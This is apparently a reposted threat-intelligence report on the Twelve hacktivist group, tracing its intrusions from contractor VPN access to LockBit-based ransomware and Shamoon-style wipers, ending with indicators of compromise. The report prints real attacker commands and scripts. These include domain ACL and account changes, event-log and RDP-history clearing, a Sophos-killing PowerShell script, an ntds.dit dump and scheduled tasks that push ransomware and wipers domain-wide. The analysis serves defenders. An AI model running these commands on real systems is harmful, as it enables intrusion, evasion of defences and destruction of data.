In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.
About Twelve
The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.
The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.
Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.
Unified Kill Chain: In
The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.
Reconnaissance
While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.
Resource Development
As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.
Initial Access and Delivery
In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.
Most times, the attackers penetrated the target infrastructure via some of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.
Exploitation
Web shells
As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows.
/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:
F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.
It is worth noting that most of the web shells used by threat actors are publicly available tools that can be found in publicly available sources. Here are two examples:
https://github[.]com/stefanpejcic/wordpress-malware;
https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.
We use the example of a remailer (script for sending email) to examine how the web shells function.
The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.
FaceFish backdoor
An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.
Like most of the web shells used by the group, this one is publicly available.
https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:
/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.
Persistence
To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.
Add-DomainGroupMember -Identity [REDACTED] -Members ‘EXCHANGE WINDOWS PERMISSIONS’
Add-DomainGroupMember -Identity [REDACTED] -Members ‘Organization Management’
Add-DomainGroupMember -Identity [REDACTED] -Members “EXCHANGE WINDOWS PERMISSIONS”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “users” -PrincipalIdentity “engineers”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “dc1” -PrincipalIdentity “users”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “dc1” -PrincipalIdentity “userasdasdasds”
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname=’nonexistent/BLAHBLAH’}
The attackers also added domain accounts and user groups with the net.exe system utility.
net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers ‘EXCHANGE WINDOWS PERMISSIONS’ /add /domain
net group ‘engineers’ ‘EXCHANGE WINDOWS PERMISSIONS’ /add /domain
net group engineers /domain
net group users /domain
net group “Domain Administrators” [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.
Defense Evasion
To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.
C:WindowsSystem32Tasksrun
C:WindowsSystem32TasksUpdate Microsoft
C:WindowsSystem32TasksYandex
C:WindowsSystem32TasksYandexUpdate
C:WindowsSYSVOL_DFSRdomainscriptsintel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.
powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}
C:Windowssystem32cmd.EXE” /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO
wevtutil.exe cl “%1
In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.
@echo off
reg delete “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault” /va /f
reg delete “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers” /f
reg add “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers”
attrib -s -h %userprofile%documentsDefault.rdp
del %userprofile%documentsDefault.rdp
del /f /s /q /a %AppData%MicrosoftWindowsRecentAutomaticDestinations
reg delete “HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU” /va /f
Command and Control
In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:
users{username}picturesphotos_deloloop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.
wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Unified Kill Chain: Through
The Through stage in terms of the Unified Cyber Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.
Pivoting
The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command:
C:ProgramDatasvchostsvchost.exe service run –config
C:ProgramDatasvchostsvchost.yml
C:ProgramDatasvchost was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.
The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.
Discovery
The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.
In addition, the group used PowerView module cmdlets to discover domain user accounts.
Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase “[REDACTED OU]”
Get-ADUser -Filter * -SearchBase “[REDACTED OU]” | findstr Name
The group used PowerShell to gain domain groups data.
Get-ADGroup
Get-ADGroup “EXCHANGE WINDOWS PERMISSIONS”
Get-ADGroupMember “EXCHANGE WINDOWS PERMISSIONS”
Get-ADGroupMember “engineers”
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi
Privilege Escalation
To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.
In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:
Add-DomainObjectAcl -Rights ‘All’
The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.
Execution
Scripts and commands
The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.
Below are some examples of attack scripts we discovered:
gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:intelGPO.bat
\netlogonlogon.bat
c:inteltest.ps1
\netlogonu.bat
SYSVOLdomainscriptsoutlookconf2003.ps1
The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.
See below for a list of commands that the attackers executed in an attempt to import the PowerView module.
impot .PowerView.ps1
import .PowerView.ps1
Import-Module .PowerView.ps1
cd C:UsersPublicDocuments
Import-Module .PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .PowerView.ps1
Sophos_kill_local.ps1
A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files.
$LogTime = Get-Date -Format “MM-dd-yyyy_hh-mm-ss”
$path = “C:Program Files (x86)SophosLogs”
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter “ExecutablePath LIKE ‘%Sophos%'”
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = ‘C:Program Files (x86)SophosLogs’+$LogTime+”_Success-Terminated”+”.txt”
$LogFile11 = ‘\[redacted]NETLOGONSophosLogs’+$pcname+”_”+$LogTime+”_Success-Terminated”+”.txt”
“The process $ProcessName ($processid) has been terminated successfully.” | Out-File $LogFile1 -Append -Force
“The process $ProcessName ($processid) has been terminated successfully.” | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = ‘C:Program Files (x86)SophosLogs’+$LogTime+”_Sophos Not-Terminated”+”.txt”
$LogFile22 = ‘\[redacted]NETLOGONSophosLogs’+$pcname+”_”+$LogTime+”_Sophos Not-Terminated”+”.txt”
“The process $ProcessName ($processid) has not been terminated.” | Out-File $LogFile2 -Append -Force
“The process $ProcessName ($processid) has not been terminated.” | Out-File $LogFile22 -Append -Force
}
}
Using the Task Scheduler
To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.
Task name
Command line
Description
Dead1
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{9042DCD8
-***}:Actions”,”cmd.exe
/c
c:programdatatwelve.exe
-pass ***
Running the ransomware via the CLI and passing a password as an argument
Dead2
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{AB35C377
-***}:Actions”,”cmd.exe
/c \[DOMAIN]netlogonwiper.
exe”
Launching a wiper via the CLI from the netlogon network share
12lock
“reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{A131C020
-***}:Actions”,”powershell
.exe Copy-Item
\[DOMAIN]netlogonwiper
.exe -Destination
C:ProgramData
Copying the wiper file with PowerShell from the netlogon network share to the local host at C:ProgramData
12lock 1
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{0B177D41
-***}:Actions”,”cmd.exe
/c
\[DOMAIN]netlogontwelve
.exe -pass ***”);
Running the ransomware from the netlogon network share via the CLI and passing a password as an argument
Copywiper
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{FB72DE3D
-***}:Actions”,”POWERSHELL
.EXE Copy-Item
\[DOMAIN]netlogontwelv
e.exe -Destination
C:ProgramData`
Copying the ransomware file with PowerShell from the netlogon network share to the local host at C:ProgramData
run
powershell -ex bypass -f
\[DOMAIN]netlogonoutloo
kconf2003.ps1
Running a PowerShell script that modifies group policies
YandexUpdate
\[DOMAIN]netlogon12.exe
-pass **************
Running the ransomware from the netlogon network share and passing a password as an argument
Update Microsoft
C:ProgramDataintel.exe
Launching a wiper
Credential Access
The adversary used mimikatz to obtain user credentials. They saved the utility file under the name calculator.exe to disguise its real purpose. However, they did not bother to change the utility’s default icon. The attackers used mimikatz to set up a dump of local credentials from the memory of the lsass.exe process.
We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.
C:Users[User]Desktopx64mimikatz.exe
C:Users[User]DesktopCrackMapExecWin_v2.2hostedInvoke-Mimikatz.ps1
C:[Redacted]x64mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by dumping the SYSTEM, SAM and SECURITY registry branches with the reg.exe system utility and saved these to the Downloads folder for subsequent archiving and exfiltration.
C:Users[USER]DownloadsSYSTEM
C:Users[USER]DownloadsSAM
C:Users[USER]DownloadsSECURITY
The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.
The command that dumps ntds.dit is shown below:
$system32ntdsutil.exe”,””$system32ntdsutil.exe” “ac i ntds” ifm “create full
c:temp” q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.
The command to collect data with All-In-One Password Recovery Pro is shown below:
c:programdataupdatexenallpasswordpro.exe” -a
“c:programdataupdatereport.html”
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.
Lateral Movement
To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.
In most cases, they connected to new devices on the victim’s network via the Remote Desktop Protocol (RDP) by using the mstsc.exe executable file. They would occasionally use PsExec to move across the network via SMB and use the Enter-PSSession command to start an interactive session with remote computers on the network, a PowerShell feature for managing and running commands on remote systems with the help of PowerShell Remoting.
Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands directly on remote machines as if running them locally. The communication process typically uses the WS-Management protocol running on top of HTTP or HTTPS.
Unified Kill Chain: Out
The Exit stage in terms of the Unified Kill Chain describes the adversary’s concluding actions after successfully infiltrating the target network and gaining access to all systems and data they are looking to access. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim’s information assets.
Collection
The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.
Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).
C:Users[User]AppDataRoamingTelegram Desktoptdatatdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram. The data can be used for quick access without having to download files again from the servers. The tdata folder also contains session files that allow the application to automatically connect to the account without the user having to reenter their login and password.
An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.
Exfiltration
The adversary uploaded archives containing data they were interested in to https://dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.
Impact
Ransomware
The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.
We detected ransomware files at the following paths:
ProgramData;
\netlogon.
The following file names featured in known incidents involving LockBit 3.0 ransomware.
twelve.exe;
1.exe;
12.exe;
enc.exe;
betta.exe;
sed.exe;
svo.exe.
Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.
As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.
powershell.exe -ex bypass -f C:UsersPublicgpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.
First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:
powershell.exe Copy-Item `\[DOMAIN]netlogontwelve.exe` -Destination `C:ProgramData`
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:
cmd.exe` /c c:programdatatwelve.exe -pass ************
The ransomware algorithm depends on the built-in configuration file. The table below shows the configuration of the Trojan in question, identical across all samples we found.
Parameter
Meaning
Description
encrypt_mode
auto
Set encryption mode for large files. This takes one of two values: “auto” or “fast”.
encrypt_filename
TRUE
Encrypt file name
impersonation
FALSE
Use accounts listed in configuration file to escalate privileges
skip_hidden_folders
FALSE
Skip hidden directories
language_check
FALSE
Check system locale
local_disks
TRUE
Encrypt local drives
network_shares
TRUE
Encrypt network directories
kill_processes
TRUE
Terminate processes
kill_services
TRUE
Stop services
running_one
TRUE
Verify that only one ransomware process is running
print_note
FALSE
Print out ransom demand
set_wallpaper
FALSE
Change desktop wallpaper
set_icons
FALSE
Change icons of encrypted files
send_report
FALSE
Send system information to C2
self_destruct
TRUE
Remove itself when done
kill_defender
TRUE
Stop Windows Defender
wipe_freespace
FALSE
Fill all available disk space with temporary file containing random data
psexec_netspread
FALSE
Spread across network via PsExec service
gpo_netspread
FALSE
Spread across network via group policies
gpo_ps_update
TRUE
Use PowerShell to update group policies across all domains
shutdown_system
FALSE
Restart system
delete_eventlogs
TRUE
Clear system logs
delete_gpo_delay
0
Deferred removal of group policy. The value in this parameter describes the time to delay deletion by.
The configuration file also contains a list of directories where encryption should be skipped.
$recycle.bin
boot
Tor browser
config.msi
program files
windows.old
$windows.~bt
program files (x86)
intel
$windows.~ws
programdata
msocache
windows
system volume information
perflogs
x64dbg
public
all users
default
Microsoft
It also contains a list of specific files that should not be encrypted.
autorun.in
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
d3d9caps.dat
GDIPFONTCACHEV1.DAT
Finally, the ransomware does not encrypt files with the following name extensions:
386
adv
ani
bat
bin
cab
cmd
com
cpl
cur
deskthemepack
diagcab
diagcfg
diagpkg
dll
drv
exe
hlp
icl
icns
ico
ics
idx
lnk
mod
mpa
msc
msp
msstyles
msu
nls
nomedia
ocx
prf
ps1
rom
rtp
scr
shs
spl
sys
theme
themepack
wpx
lock
key
hta
msi
pdb
search-ms
Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.
sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad
calc
wuauclt
onedrive
The ransomware also terminates the following services:
vss
sql
svc$
memtas
mepocs
msexchange
veeam
backup
GxVss
GxBlr
GxFWD
GxCVD
kavfs
AVP
avpsus
Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:
c:netlogonenc.exe
c:UsersUserenc.exe
c:WindowsSystem32configsystemprofileappdataroamingtwelve.exe
c:Windowssysvoldomainscriptsenc.exe
As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.
At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.
Wipers
In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.
The wiper file we found had been compiled from publicly available source code. The wiper rewrites the master boot record (MBR) on connected drives so when the victim next turns on the device, the “From Iran with love – Shamoon” message appears on the screen, and the operating system will not load.
The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:
Overwrite the file contents with randomly generated bytes;
Overwrite file metadata: reset size and set random created/modified/opened dates;
Assign a random name to the file and delete it.
When done, the malicious file deletes itself and shuts down the system.
As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.
Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.
While investigating attacks by the group, we found wiper files at the following paths:
Desktop;
ProgramData;
\netlogon.
The following file names have featured in known incidents involving the wiper:
intel.exe;
mail.exe;
wiper.exe.
The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.
powershell -ex bypass -f \[DOMAIN]netlogonoutlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.
powershell.exe` Copy-Item `\[DOMAIN]netlogonintel.exe` -Destination `C:ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.
C:ProgramDataintel.exe
Objectives
The threat actor’s strategic goals:
Destroy critical infrastructure and disrupt business;
Steal sensitive data;
Discredit victims by reporting the compromise on the attackers’ Telegram channel.
Takeaways
Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.
Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own. This makes it possible to detect and prevent Twelve’s attacks in due time. Failure to do so could result in the organization’s infrastructure sustaining significant damage from the threat actor.
Indicators of compromise
Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679
Mimikatz
e930b05efe23891d19bc354a4209be3e
Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2
Ngrok
43b3520d69dea9b0a27cce43c1608cad
Cobalt Strike
7bec3c59d412f6f394a290f95975e21f
Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE
Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe
File paths
C:ProgramDatased.exe
C:Users{username}Downloadssed.exe
C:Users{username}Desktopsed.exe
C:programdatasvchostsvchost.exe
C:programdatasvchostsvchost.yml
C:Users{username}AppDataLocalCEFUser DataDictionariessvchost.exe
C:Users{username}AppDataLocalCEFUser DataDictionariessvchost.yml
C:Users{username}Desktopsvchost.exe
C:Users{username}Desktopsvchost.yml
C:users{username}picturesphotos_deloloop.exe
C:users{username}downloadschisel_1.9.1_windows_amd64chisel.exe
C:Users{username}DocumentsPowerView.ps1
C:Users{username}Documentscalculator.exe
C:WindowsqbkLIdag.exe
C:WindowsSystem32Tasksrun
C:WindowsSystem32TasksUpdate Microsoft
C:WindowsSystem32TasksYandex
C:WindowsSystem32TasksYandexUpdate
C:WindowsSYSVOLdomainscriptsintel.exe
C:WindowsSYSVOLdomainscriptsoutlookconf2003.ps1
C:WindowsSYSVOLdomainscriptsZZZZZZ
C:WindowsSYSVOL_DFSRdomainscriptsintel.exe
\[DOMAIN]netlogon12.exe
\[DOMAIN]netlogonoutlookconf2003.ps1
\[DOMAIN]netlogonintel.exe
C:12312.exe
C:ProgramDataintel.exe
C:UsersPublic46a2209036e6282c45f8dfd3f046033d.ps1
C:UsersPublicgpo.ps1
C:WindowsLogsPsExec.exe
Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220
Article Link: Twelve: from initial compromise to ransomware and wipers | Securelist
1 post – 1 participant
In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.
About Twelve
The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.
The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.
Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.
Unified Kill Chain: In
The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.
Reconnaissance
While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.
Resource Development
As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.
Initial Access and Delivery
In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.
Most times, the attackers penetrated the target infrastructure via some of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.
Exploitation
Web shells
As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows./home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.
Examples of web shells for moving files
It is worth noting that most of the web shells used by threat actors are publicly available tools that can be found in publicly available sources. Here are two examples:
https://github[.]com/stefanpejcic/wordpress-malware;
https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.
We use the example of a remailer (script for sending email) to examine how the web shells function.
Example of a remailer script used by the threat actor
The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.
FaceFish backdoor
An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.
Like most of the web shells used by the group, this one is publicly available.https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
